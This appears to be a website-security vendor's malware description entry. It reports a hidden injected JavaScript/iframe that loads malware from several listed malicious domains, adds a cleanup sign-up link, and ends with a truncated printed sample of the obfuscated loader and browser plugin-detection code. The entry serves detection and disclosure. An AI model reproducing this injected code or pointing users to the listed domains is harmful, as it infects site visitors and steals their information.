Description:
A hidden and suspicious javascript (or iframe) was found on the site. It is loaded from a blacklisted (and malicious domain) and used to steal information from site visitors and/or infect them. Loads malware from multiple locations:
http://dsnextgen.com/?a_id=10636..
http://perfumefrosty.org/nnc0xazxwahh5ifg/
http://www.paid-to-promote.net/
http://www.777seo.com/pop.php?username=..
(and many other domains).
Affecting:
Any web site
Clean up:
This malware is generally hidden on .js or .php files without heavy encoding. Sign up here to get it cleaned: http://sucuri.net/signup
Malware dump (sample of malware):
gab = 14; gab- = 2361;amp=8201;if(amp!=null){ran=2318;ran++;wry=0.001;wry++}wit=oxo("ExBWOB4XquJZ8l0h5MnMl37j2zZHx0eZStpY3trfFkYl2VtTRtAyX3UamBnEl0WGBROBg1aPdM8lub5UrAYaTSMWgTxNefSAywzUr5jiLhTYtUZUJEXWUrv1n4keCPVWiY4lqKJY8curQz1SEpLjiag9KXhjUvIOvBGZj6LjTKwhZMA3d7',7);
var PluginDetect={version:"0.7.5",name:"PluginDetect",handler:function(c,b,a)
{return function(){c(b,a)}},isDefined:function(b){return
typeof b!="undefined"},isArray:function(b)
{return(/array/i).test(Object.prototype.toString.call(b))},isF
unc:function(b){return typeof
b=="function"},isString:function(b){return typeof
b=="string"},isNum:function(b){return typeof
b=="number"},isStrNum:function(b){return(typeof b=="string"&&